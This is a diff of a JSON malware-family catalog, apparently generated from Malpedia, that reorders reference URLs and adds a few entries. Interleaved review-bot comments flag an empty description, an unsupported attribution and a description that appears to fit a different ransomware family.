+ "https://www.virusbulletin.com/blog/2018/04/gravityrat-malware-takes-your-systems-temperature/",
+ "https://blog.talosintelligence.com/2018/04/gravityrat-two-year-evolution-of-apt.html"
 ],
 "synonyms": [],
 "type": []
@@ -26849,9 +28101,9 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.grease",
- "https://labs.withsecure.com/content/dam/labs/docs/WithSecure-Lazarus-No-Pineapple-Threat-Intelligence-Report-2023.pdf",
+ "https://asert.arbornetworks.com/stolen-pencil-campaign-targets-academia/",
 "https://us-cert.cisa.gov/ncas/alerts/aa20-301a",
- "https://asert.arbornetworks.com/stolen-pencil-campaign-targets-academia/"
+ "https://labs.withsecure.com/content/dam/labs/docs/WithSecure-Lazarus-No-Pineapple-Threat-Intelligence-Report-2023.pdf"
 ],
 "synonyms": [],
 "type": []
@@ -26874,20 +28126,33 @@ "uuid": "9d0ddcb9-b0da-436a-af73-d9307609bd17", "value": "GreenShaitan" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.greetingghoul", + "https://securelist.com/doublefinger-loader-delivering-greetingghoul-cryptocurrency-stealer/109982/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "b8763a6f-2711-454d-bbde-7408ebe932c1", + "value": "GreetingGhoul" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.grey_energy", - "https://enterprise.verizon.com/resources/reports/2019-data-breach-investigations-report.pdf", - "https://www.secureworks.com/research/threat-profiles/iron-viking", - "https://blog.nviso.eu/2022/02/24/threat-update-ukraine-russia-tensions/", - "https://securelist.com/greyenergys-overlap-with-zebrocy/89506/", - "https://github.com/NozomiNetworks/greyenergy-unpacker", - "https://www.welivesecurity.com/wp-content/uploads/2018/10/ESET_GreyEnergy.pdf", - "https://www.eset.com/int/greyenergy-exposed/", "https://www.nozominetworks.com/2019/02/12/blog/greyenergy-malware-research-paper-maldoc-to-backdoor/", - "https://attack.mitre.org/groups/G0034" + "https://www.eset.com/int/greyenergy-exposed/", + "https://enterprise.verizon.com/resources/reports/2019-data-breach-investigations-report.pdf", + "https://www.welivesecurity.com/wp-content/uploads/2018/10/ESET_GreyEnergy.pdf", + "https://attack.mitre.org/groups/G0034", + "https://blog.nviso.eu/2022/02/24/threat-update-ukraine-russia-tensions/", + "https://github.com/NozomiNetworks/greyenergy-unpacker", + "https://securelist.com/greyenergys-overlap-with-zebrocy/89506/", + "https://www.secureworks.com/research/threat-profiles/iron-viking" ], "synonyms": [], "type": [] 
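Review bot: The new GreetingGhoul entry ships with an empty `"description": ""`, while the other additions in this patch (GraphDrop, Graphican, Growtopia) each carry at least one sentence, so this entry gives analysts nothing to match on but the name. The only non-Malpedia reference's slug, `doublefinger-loader-delivering-greetingghoul-cryptocurrency-stealer`, supports a minimal line such as `"description": "Cryptocurrency stealer delivered by the DoubleFinger loader, per Securelist."`. If the generator copies Malpedia's description verbatim, the empty string should be fixed upstream rather than hand-edited here, otherwise the next refresh will blank it again.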
@@ -26900,8 +28165,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.grillmark",
- "https://securelist.com/the-chronicles-of-the-hellsing-apt-the-empire-strikes-back/69567/",
- "https://content.fireeye.com/m-trends/rpt-m-trends-2019"
+ "https://content.fireeye.com/m-trends/rpt-m-trends-2019",
+ "https://securelist.com/the-chronicles-of-the-hellsing-apt-the-empire-strikes-back/69567/"
 ],
 "synonyms": [
 "Hellsing Backdoor"
@@ -26916,9 +28181,9 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.grimagent",
- "https://twitter.com/bryceabdo/status/1352359414746009608",
 "https://gibnc.group-ib.com/s/Group-IB_GrimAgent_analysis#pdfviewer",
 "https://www.mandiant.com/resources/fin12-ransomware-intrusion-actor-pursuing-healthcare-targets",
+ "https://twitter.com/bryceabdo/status/1352359414746009608",
 "https://blog.group-ib.com/grimagent"
 ],
 "synonyms": [],
@@ -26933,17 +28198,17 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.grimplant", "https://www.mandiant.com/resources/spear-phish-ukrainian-entities", + "https://www.govinfosecurity.com/cyber-espionage-actor-deploying-malware-using-excel-a-18830", "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war/", - "https://cip.gov.ua/en/news/khto-stoyit-za-kiberatakami-na-ukrayinsku-kritichnu-informaciinu-infrastrukturu-statistika-15-22-bereznya", - "https://www.intezer.com/blog/research/elephant-malware-targeting-ukrainian-orgs/", "https://www.sentinelone.com/blog/threat-actor-uac-0056-targeting-ukraine-with-fake-translation-software/", "https://inquest.net/blog/2022/04/07/ukraine-cyberwar-overview", - "https://cert.gov.ua/article/38374", - "https://blog.malwarebytes.com/threat-intelligence/2022/04/new-uac-0056-activity-theres-a-go-elephant-in-the-room/", "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war", - "https://www.govinfosecurity.com/cyber-espionage-actor-deploying-malware-using-excel-a-18830", + "https://blog.malwarebytes.com/threat-intelligence/2022/04/new-uac-0056-activity-theres-a-go-elephant-in-the-room/", + "https://www.cybercom.mil/Media/News/Article/3098856/cyber-national-mission-force-discloses-iocs-from-ukrainian-networks/", + "https://cert.gov.ua/article/38374", + "https://www.intezer.com/blog/research/elephant-malware-targeting-ukrainian-orgs/", "https://businessinsights.bitdefender.com/deep-dive-into-the-elephant-framework-a-new-cyber-threat-in-ukraine", - "https://www.cybercom.mil/Media/News/Article/3098856/cyber-national-mission-force-discloses-iocs-from-ukrainian-networks/" + "https://cip.gov.ua/en/news/khto-stoyit-za-kiberatakami-na-ukrayinsku-kritichnu-informaciinu-infrastrukturu-statistika-15-22-bereznya" ], "synonyms": [], "type": [] 
@@ -26964,16 +28229,29 @@ "uuid": "5ba66415-b482-44ff-8dfa-809329e0e074", "value": "GROK" }, + { + "description": "According to PCrisk, Growtopia (also known as CyberStealer) is an information stealer written in the C# programming language. It can obtain system information, steal information from various applications, and capture screenshots. Its developer claims that it has created this software for educational purposes only. This stealer uses the name of a legitimate online game.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.growtopia", + "https://github.com/TheC0mpany/GrowtopiaStealer" + ], + "synonyms": [], + "type": [] + }, + "uuid": "5fb7db86-a510-400c-b7d3-4197eef09755", + "value": "Growtopia" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.grunt", - "https://blog.talosintelligence.com/2020/02/building-bypass-with-msbuild.html", - "https://twitter.com/ItsReallyNick/status/1208141697282117633", - "https://www.telsy.com/download/5776/?uid=aca91e397e", "https://michaelkoczwara.medium.com/hunting-c2-with-shodan-223ca250d06f", - "https://ti.qianxin.com/blog/articles/Suspected-Russian-speaking-attackers-use-COVID19-vaccine-decoys-against-Middle-East/" + "https://www.telsy.com/download/5776/?uid=aca91e397e", + "https://ti.qianxin.com/blog/articles/Suspected-Russian-speaking-attackers-use-COVID19-vaccine-decoys-against-Middle-East/", + "https://blog.talosintelligence.com/2020/02/building-bypass-with-msbuild.html", + "https://twitter.com/ItsReallyNick/status/1208141697282117633" ], "synonyms": [], "type": [] 
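Review bot: The new Growtopia description opens with "According to PCrisk", but no PCrisk URL appears in its `refs`; the only non-Malpedia reference is `"https://github.com/TheC0mpany/GrowtopiaStealer"`, which from its name appears to be the stealer's own source repository rather than a write-up. Either the PCrisk article the text is quoting should be added to `refs`, or the attribution dropped so the description stands on the references it actually cites. Because the GitHub link points at what looks like live malware source, a short caveat in the description — e.g. appending `The GitHub reference is the stealer's source repository.` — would warn consumers that auto-fetch or sandbox references.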
@@ -27012,9 +28290,9 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.gwisin",
+ "https://www.skshieldus.com/download/files/download.do?o_fname=%EA%B7%80%EC%8B%A0(Gwisin)%20%EB%9E%9C%EC%84%AC%EC%9B%A8%EC%96%B4%20%EA%B3%B5%EA%B2%A9%20%EC%A0%84%EB%9E%B5%20%EB%B6%84%EC%84%9D%20%EB%A6%AC%ED%8F%AC%ED%8A%B8.pdf&r_fname=20220824150111854.pdf",
 "https://asec.ahnlab.com/en/37483",
- "https://asec.ahnlab.com/en/41565/",
- "https://www.skshieldus.com/download/files/download.do?o_fname=%EA%B7%80%EC%8B%A0(Gwisin)%20%EB%9E%9C%EC%84%AC%EC%9B%A8%EC%96%B4%20%EA%B3%B5%EA%B2%A9%20%EC%A0%84%EB%9E%B5%20%EB%B6%84%EC%84%9D%20%EB%A6%AC%ED%8F%AC%ED%8A%B8.pdf&r_fname=20220824150111854.pdf"
+ "https://asec.ahnlab.com/en/41565/"
 ],
 "synonyms": [],
 "type": []
@@ -27076,27 +28354,27 @@
 "value": "HackSpy"
 },
 {
- "description": "Ransomware.",
+ "description": "According to PCrisk, Hades Locker is an updated version of WildFire Locker ransomware that infiltrates systems and encrypts a variety of data types using AES encryption. Hades Locker appends the names of encrypted files with the \".~HL[5_random_characters] (first 5 characters of encryption password)\" extension.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.hades",
- "https://www.sentinelone.com/wp-content/uploads/2022/02/S1_-SentinelLabs_SanctionsBeDamned_final_02.pdf",
- "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3",
- "https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions",
- "https://www.accenture.com/us-en/blogs/security/ransomware-hades",
- "https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/",
+ "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf",
 "https://awakesecurity.com/blog/incident-response-hades-ransomware-gang-or-hafnium/",
 "https://www.advanced-intel.com/post/adversarial-perspective-advintel-breach-avoidance-through-monitoring-initial-vulnerabilities",
- "https://assets.sentinelone.com/sentinellabs/sentinellabs_EvilCorp",
- "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf",
- "http://www.secureworks.com/research/threat-profiles/gold-winter",
- "https://killingthebear.jorgetesta.tech/actors/evil-corp",
- "https://twitter.com/inversecos/status/1381477874046169089?s=20",
- "https://www.accenture.com/us-en/blogs/cyber-defense/unknown-threat-group-using-hades-ransomware",
+ "https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions",
 "https://www.bleepingcomputer.com/news/security/evil-corp-switches-to-hades-ransomware-to-evade-sanctions/",
- "https://www.huntandhackett.com/blog/advanced-ip-scanner-the-preferred-scanner-in-the-apt-toolbox",
 "https://www.secureworks.com/blog/hades-ransomware-operators-use-distinctive-tactics-and-infrastructure",
- "https://blog.truesec.com/2021/05/05/are-the-notorious-cyber-criminals-evil-corp-actually-russian-spies/"
+ "https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/",
+ "https://www.sentinelone.com/wp-content/uploads/2022/02/S1_-SentinelLabs_SanctionsBeDamned_final_02.pdf",
+ "https://www.accenture.com/us-en/blogs/cyber-defense/unknown-threat-group-using-hades-ransomware",
+ "https://www.huntandhackett.com/blog/advanced-ip-scanner-the-preferred-scanner-in-the-apt-toolbox",
+ "https://blog.truesec.com/2021/05/05/are-the-notorious-cyber-criminals-evil-corp-actually-russian-spies/",
+ "https://www.accenture.com/us-en/blogs/security/ransomware-hades",
+ "https://twitter.com/inversecos/status/1381477874046169089?s=20",
+ "https://killingthebear.jorgetesta.tech/actors/evil-corp",
+ "https://assets.sentinelone.com/sentinellabs/sentinellabs_EvilCorp",
+ "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3",
+ "http://www.secureworks.com/research/threat-profiles/gold-winter"
 ],
 "synonyms": [],
 "type": []
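Review bot: The new `description` on the win.hades entry describes Hades Locker, an updated WildFire Locker variant that uses the `.~HL` extension, while the entry's `refs` are almost entirely about the 2021 Hades ransomware tied to Evil Corp / UNC2165 (the unc2165-shifts-to-evade-sanctions, evil-corp-switches-to-hades-ransomware, gold-winter and SanctionsBeDamned references). Those look like two different families that happen to share a name, so the PCrisk text appears to label the wrong one. Worth confirming against the upstream Malpedia page before merging; if the entry is meant to be the Evil Corp family, a one-sentence description matching the references (or the previous placeholder) is safer than a confidently wrong one, since the description is what most consumers display.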
@@ -27109,26 +28387,26 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.hakbit",
- "https://www.justice.gov/usao-edny/press-release/file/1505981/download",
+ "https://www.cybereason.com/blog/cybereason-vs.-prometheus-ransomware",
+ "https://medium.com/s2wlab/quick-analysis-of-haron-ransomware-feat-avaddon-and-thanos-1ebb70f64dc4",
+ "https://securelist.com/cis-ransomware/104452/",
+ "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
+ "https://blog.cyble.com/2021/06/05/prometheus-an-emerging-apt-group-using-thanos-ransomware-to-target-organizations/",
+ "https://www.sekoia.io/en/the-story-of-a-ransomware-builder-from-thanos-to-spook-and-beyond-part-1/",
+ "https://securityintelligence.com/posts/ransomware-encryption-goes-wrong/",
 "http://id-ransomware.blogspot.com/2019/11/hakbit-ransomware.html",
 "https://www.zscaler.com/blogs/security-research/midas-ransomware-tracing-evolution-thanos-ransomware-variants",
- "https://www.cybereason.com/blog/cybereason-vs.-prometheus-ransomware",
- "https://blog.cyble.com/2021/06/05/prometheus-an-emerging-apt-group-using-thanos-ransomware-to-target-organizations/",
- "https://securityintelligence.com/posts/ransomware-encryption-goes-wrong/",
- "https://medium.com/s2wlab/quick-analysis-of-haron-ransomware-feat-avaddon-and-thanos-1ebb70f64dc4",
- "https://go.recordedfuture.com/hubfs/reports/cta-2020-0610.pdf",
 "https://www.carbonblack.com/2020/06/08/tau-threat-analysis-hakbit-ransomware/",
+ "https://www.seqrite.com/blog/thanos-ransomware-evading-anti-ransomware-protection-with-riplace-tactic/",
+ "https://unit42.paloaltonetworks.com/thanos-ransomware/",
+ "https://securityboulevard.com/2022/03/midas-ransomware-tracing-the-evolution-of-thanos-ransomware-variants/",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2020-0610.pdf",
 "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/",
 "https://unit42.paloaltonetworks.com/prometheus-ransomware/",
- "https://securityboulevard.com/2022/03/midas-ransomware-tracing-the-evolution-of-thanos-ransomware-variants/",
- "https://www.sekoia.io/en/the-story-of-a-ransomware-builder-from-thanos-to-spook-and-beyond-part-1/",
 "https://www.carbonblack.com/2020/06/15/tau-threat-analysis-relations-to-hakbit-ransomware/",
 "https://www.proofpoint.com/us/blog/threat-insight/hakbit-ransomware-campaign-against-germany-austria-switzerland",
- "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
- "https://securelist.com/cis-ransomware/104452/",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
- "https://www.seqrite.com/blog/thanos-ransomware-evading-anti-ransomware-protection-with-riplace-tactic/",
- "https://unit42.paloaltonetworks.com/thanos-ransomware/"
+ "https://www.justice.gov/usao-edny/press-release/file/1505981/download",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf"
 ],
 "synonyms": [
 "Thanos Ransomware"
@@ -27138,13 +28416,26 @@
 "uuid": "18617856-c6c4-45f8-995f-4916a1b45b05",
 "value": "Hakbit"
 },
+ {
+ "description": "A stager used by APT29 to deploy CobaltStrike.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.halfrig",
+ "https://www.gov.pl/attachment/64193e8d-05e2-4cbf-bb4c-5f58da21fefb"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "c89b2d7b-82b7-4329-81d0-ed99be4fad96",
+ "value": "HALFRIG"
+ },
 {
 "description": "",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.hamweq",
- "https://blag.nullteilerfrei.de/2020/05/31/string-obfuscation-in-the-hamweq-irc-bot/",
 "https://www.youtube.com/watch?v=FAFuSO9oAl0",
+ "https://blag.nullteilerfrei.de/2020/05/31/string-obfuscation-in-the-hamweq-irc-bot/",
 "https://www.cert.pl/wp-content/uploads/2011/06/201106_hamweq.pdf",
 "https://www.youtube.com/watch?v=JPvcLLYR0tE"
 ],
@@ -27160,46 +28451,46 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.hancitor",
 "https://www.0ffset.net/reverse-engineering/malware-analysis/hancitor-maldoc-analysis/",
- "https://pid4.io/posts/how_to_write_a_hancitor_extractor/",
- "https://researchcenter.paloaltonetworks.com/2018/02/unit42-dissecting-hancitors-latest-2018-packer/",
- "https://www.binarydefense.com/analysis-of-hancitor-when-boring-begets-beacon",
- "https://researchcenter.paloaltonetworks.com/2016/08/unit42-pythons-and-unicorns-and-hancitoroh-my-decoding-binaries-through-emulation/",
- "https://elis531989.medium.com/dissecting-and-automating-hancitors-config-extraction-1a6ed85d99b8",
- "https://www.malware-traffic-analysis.net/2021/09/29/index.html",
- "https://blog.minerva-labs.com/new-hancitor-pimp-my-downloader",
- "https://www.intel471.com/blog/Cobalt-strike-cybercriminals-trickbot-qbot-hancitor",
- "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/hancitor-making-use-of-cookies-to-prevent-url-scraping",
- "https://www.zscaler.com/blogs/research/chanitor-downloader-actively-installing-vawtrak",
- "https://inquest.net/blog/2021/04/16/unearthing-hancitor-infrastructure",
- "https://isc.sans.edu/diary/rss/27618",
- "https://www.uperesia.com/hancitor-packer-demystified",
- "https://github.com/OALabs/Lab-Notes/blob/main/Hancitor/hancitor.ipynb",
- "https://unit42.paloaltonetworks.com/wireshark-tutorial-hancitor-followup-malware/",
- "https://cyber-anubis.github.io/malware%20analysis/hancitor/",
- "https://muha2xmad.github.io/malware-analysis/fullHancitor/",
- "https://isc.sans.edu/forums/diary/Hancitor+activity+resumes+after+a+hoilday+break/26980/",
- "https://www.vmray.com/cyber-security-blog/hancitor-multi-step-delivery-process-malware-analysis-spotlight/",
- "https://fidelissecurity.com/threatgeek/archive/me-and-mr-robot-tracking-actor-behind-man1-crypter/",
- "https://blog.group-ib.com/hancitor-cuba-ransomware",
- "https://muha2xmad.github.io/unpacking/hancitor/",
- "https://medium.com/@crovax/extracting-hancitors-configuration-with-ghidra-7963900494b5",
- "https://twitter.com/TheDFIRReport/status/1359669513520873473",
- "https://blog.group-ib.com/prometheus-tds",
- "https://thedfirreport.com/2021/06/28/hancitor-continues-to-push-cobalt-strike/",
- "https://www.vkremez.com/2018/11/lets-learn-in-depth-reversing-of.html",
- "https://malware-traffic-analysis.net/2021/09/29/index.html",
- "https://www.0ffset.net/reverse-engineering/malware-analysis/hancitor-analysing-the-main-loader/",
- "https://www.dodgethissecurity.com/2019/11/01/hancitor-evasive-new-waves-and-how-com-objects-can-use-cached-credentials-for-proxy-authentication/",
- "https://www.proofpoint.com/us/threat-insight/post/hancitor-ruckguv-reappear",
- "https://blog.group-ib.com/switching-side-jobs",
- "https://www.fireeye.com/blog/threat-research/2016/09/hancitor_aka_chanit.html",
- "https://www.silentpush.com/blog/pivoting-finding-malware-domains-without-seeing-malicious-activity",
- "https://unit42.paloaltonetworks.com/hancitor-infections-cobalt-strike/",
- "https://0ffset.net/reverse-engineering/malware-analysis/reversing-hancitor-again/",
- "https://researchcenter.paloaltonetworks.com/2016/08/unit42-vb-dropper-and-shellcode-for-hancitor-reveal-new-techniques-behind-uptick/",
- "https://researchcenter.paloaltonetworks.com/2018/02/unit42-compromised-servers-fraud-accounts-recent-hancitor-attacks/",
 "https://thedfirreport.com/2021/11/01/from-zero-to-domain-admin/",
- "https://medium.com/walmartglobaltech/man1-moskal-hancitor-and-a-side-of-ransomware-d77b4d991618"
+ "https://isc.sans.edu/diary/rss/27618",
+ "https://www.silentpush.com/blog/pivoting-finding-malware-domains-without-seeing-malicious-activity",
+ "https://unit42.paloaltonetworks.com/wireshark-tutorial-hancitor-followup-malware/",
+ "https://medium.com/@crovax/extracting-hancitors-configuration-with-ghidra-7963900494b5",
+ "https://www.0ffset.net/reverse-engineering/malware-analysis/hancitor-analysing-the-main-loader/",
+ "https://unit42.paloaltonetworks.com/hancitor-infections-cobalt-strike/",
+ "https://fidelissecurity.com/threatgeek/archive/me-and-mr-robot-tracking-actor-behind-man1-crypter/",
+ "https://thedfirreport.com/2021/06/28/hancitor-continues-to-push-cobalt-strike/",
+ "https://www.zscaler.com/blogs/research/chanitor-downloader-actively-installing-vawtrak",
+ "https://researchcenter.paloaltonetworks.com/2018/02/unit42-dissecting-hancitors-latest-2018-packer/",
+ "https://www.fireeye.com/blog/threat-research/2016/09/hancitor_aka_chanit.html",
+ "https://www.vmray.com/cyber-security-blog/hancitor-multi-step-delivery-process-malware-analysis-spotlight/",
+ "https://malware-traffic-analysis.net/2021/09/29/index.html",
+ "https://twitter.com/TheDFIRReport/status/1359669513520873473",
+ "https://www.uperesia.com/hancitor-packer-demystified",
+ "https://blog.group-ib.com/prometheus-tds",
+ "https://researchcenter.paloaltonetworks.com/2016/08/unit42-pythons-and-unicorns-and-hancitoroh-my-decoding-binaries-through-emulation/",
+ "https://www.binarydefense.com/analysis-of-hancitor-when-boring-begets-beacon",
+ "https://cyber-anubis.github.io/malware%20analysis/hancitor/",
+ "https://www.dodgethissecurity.com/2019/11/01/hancitor-evasive-new-waves-and-how-com-objects-can-use-cached-credentials-for-proxy-authentication/",
+ "https://muha2xmad.github.io/unpacking/hancitor/",
+ "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/hancitor-making-use-of-cookies-to-prevent-url-scraping",
+ "https://pid4.io/posts/how_to_write_a_hancitor_extractor/",
+ "https://blog.group-ib.com/switching-side-jobs",
+ "https://researchcenter.paloaltonetworks.com/2016/08/unit42-vb-dropper-and-shellcode-for-hancitor-reveal-new-techniques-behind-uptick/",
+ "https://www.malware-traffic-analysis.net/2021/09/29/index.html",
+ "https://medium.com/walmartglobaltech/man1-moskal-hancitor-and-a-side-of-ransomware-d77b4d991618",
+ "https://0ffset.net/reverse-engineering/malware-analysis/reversing-hancitor-again/",
+ "https://www.vkremez.com/2018/11/lets-learn-in-depth-reversing-of.html",
+ "https://elis531989.medium.com/dissecting-and-automating-hancitors-config-extraction-1a6ed85d99b8",
+ "https://muha2xmad.github.io/malware-analysis/fullHancitor/",
+ "https://inquest.net/blog/2021/04/16/unearthing-hancitor-infrastructure",
+ "https://isc.sans.edu/forums/diary/Hancitor+activity+resumes+after+a+hoilday+break/26980/",
+ "https://researchcenter.paloaltonetworks.com/2018/02/unit42-compromised-servers-fraud-accounts-recent-hancitor-attacks/",
+ "https://github.com/OALabs/Lab-Notes/blob/main/Hancitor/hancitor.ipynb",
+ "https://blog.group-ib.com/hancitor-cuba-ransomware",
+ "https://blog.minerva-labs.com/new-hancitor-pimp-my-downloader",
+ "https://www.proofpoint.com/us/threat-insight/post/hancitor-ruckguv-reappear",
+ "https://www.intel471.com/blog/Cobalt-strike-cybercriminals-trickbot-qbot-hancitor"
 ],
 "synonyms": [
 "Chanitor"
@@ -27226,8 +28517,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.hardrain",
- "https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-F.pdf",
- "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf"
+ "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf",
+ "https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-F.pdf"
 ],
 "synonyms": [],
 "type": []
@@ -27256,8 +28547,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.haron",
- "https://threatpost.com/ransomware-gangs-haron-blackmatter/168212/",
- "https://medium.com/walmartglobaltech/decoding-smartassembly-strings-a-haron-ransomware-case-study-9d0c5af7080b"
+ "https://medium.com/walmartglobaltech/decoding-smartassembly-strings-a-haron-ransomware-case-study-9d0c5af7080b",
+ "https://threatpost.com/ransomware-gangs-haron-blackmatter/168212/"
 ],
 "synonyms": [],
 "type": []
@@ -27284,10 +28575,10 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.havex_rat",
 "https://www.cisa.gov/uscert/ncas/alerts/aa22-083a",
- "https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors",
- "https://www.f-secure.com/weblog/archives/00002718.html",
 "https://www.secureworks.com/research/threat-profiles/iron-liberty",
+ "https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors",
 "https://vblocalhost.com/uploads/VB2021-Slowik.pdf",
+ "https://www.f-secure.com/weblog/archives/00002718.html",
 "https://pylos.co/2020/11/04/the-enigmatic-energetic-bear/"
 ],
 "synonyms": [],
@@ -27301,11 +28592,13 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.havoc",
- "https://www.zscaler.com/blogs/security-research/havoc-across-cyberspace",
- "https://twitter.com/embee_research/status/1579668721777643520?s=20&t=nDJOv1Yf5mQZKCou7qMrhQ",
 "https://github.com/HavocFramework/Havoc",
+ "https://4pfsec.com/havoc-c2-first-look/",
+ "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q2%20Botnet%20Threat%20Update.pdf",
+ "https://twitter.com/embee_research/status/1579668721777643520?s=20&t=nDJOv1Yf5mQZKCou7qMrhQ",
 "https://www.youtube.com/watch?v=ErPKP4Ms28s",
- "https://4pfsec.com/havoc-c2-first-look/"
+ "https://www.zscaler.com/blogs/security-research/havoc-across-cyberspace",
+ "https://checkmarx.com/blog/first-known-targeted-oss-supply-chain-attacks-against-the-banking-sector/"
 ],
 "synonyms": [
 "Havokiz"
@@ -27333,27 +28626,27 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.hawkeye_keylogger",
- "https://securityintelligence.com/posts/roboski-global-recovery-automation/",
- "https://www.secureworks.com/research/threat-profiles/gold-galleon",
+ "http://www.secureworks.com/research/threat-profiles/gold-galleon",
 "https://researchcenter.paloaltonetworks.com/2015/10/surveillance-malware-trends-tracking-predator-pain-and-hawkeye/",
- "https://www.fireeye.com/blog/threat-research/2017/07/hawkeye-malware-distributed-in-phishing-campaign.html",
+ "https://www.govcert.ch/blog/analysis-of-an-unusual-hawkeye-sample/",
+ "https://blog.talosintelligence.com/2019/04/hawkeye-reborn.html",
+ "https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/covid-19-cybercrime-m00nd3v-hawkeye-malware-threat-actor/",
 "https://cloudblogs.microsoft.com/microsoftsecure/2018/07/11/hawkeye-keylogger-reborn-v8-an-in-depth-campaign-analysis/",
 "https://labs.bitdefender.com/2020/03/5-times-more-coronavirus-themed-malware-reports-during-march/?utm_campaign=twitter&utm_medium=twitter&utm_source=twitter",
- "https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/covid-19-cybercrime-m00nd3v-hawkeye-malware-threat-actor/",
- "https://research.checkpoint.com/2023/following-the-scent-of-trickgate-6-year-old-packer-used-to-deploy-the-most-wanted-malware/",
- "https://www.cyberbit.com/blog/endpoint-security/hawkeye-malware-keylogging-technique/",
- "https://nakedsecurity.sophos.com/2016/02/29/the-hawkeye-attack-how-cybercrooks-target-small-businesses-for-big-money/",
- "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/",
- "https://www.trustwave.com/Resources/SpiderLabs-Blog/How-I-Cracked-a-Keylogger-and-Ended-Up-in-Someone-s-Inbox/",
- "https://github.com/itaymigdal/malware-analysis-writeups/blob/main/HawkEye/HawkEye.md",
- "https://securelist.com/apt-trends-report-q2-2019/91897/",
- "https://www.fortinet.com/blog/threat-research/hawkeye-malware-analysis.html",
- "https://blog.talosintelligence.com/2019/04/hawkeye-reborn.html",
- "https://www.govcert.ch/blog/analysis-of-an-unusual-hawkeye-sample/",
 "https://www.cyberbit.com/hawkeye-malware-keylogging-technique/",
 "https://www.secureworks.com/research/gold-galleon-how-a-nigerian-cyber-crew-plunders-the-shipping-industry",
+ "https://research.checkpoint.com/2023/following-the-scent-of-trickgate-6-year-old-packer-used-to-deploy-the-most-wanted-malware/",
+ "https://www.secureworks.com/research/threat-profiles/gold-galleon",
+ "https://securityintelligence.com/posts/roboski-global-recovery-automation/",
+ "https://www.cyberbit.com/blog/endpoint-security/hawkeye-malware-keylogging-technique/",
+ "https://nakedsecurity.sophos.com/2016/02/29/the-hawkeye-attack-how-cybercrooks-target-small-businesses-for-big-money/",
+ "https://securelist.com/apt-trends-report-q2-2019/91897/",
+ "https://github.com/itaymigdal/malware-analysis-writeups/blob/main/HawkEye/HawkEye.md",
+ "https://www.trustwave.com/Resources/SpiderLabs-Blog/How-I-Cracked-a-Keylogger-and-Ended-Up-in-Someone-s-Inbox/",
+ "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/",
 "http://stopmalvertising.com/malware-reports/analysis-of-the-predator-pain-keylogger.html",
- "http://www.secureworks.com/research/threat-profiles/gold-galleon"
+ "https://www.fireeye.com/blog/threat-research/2017/07/hawkeye-malware-distributed-in-phishing-campaign.html",
+ "https://www.fortinet.com/blog/threat-research/hawkeye-malware-analysis.html"
 ],
 "synonyms": [
 "HawkEye",
@@ -27400,11 +28693,11 @@
 "meta": {
 "refs": [
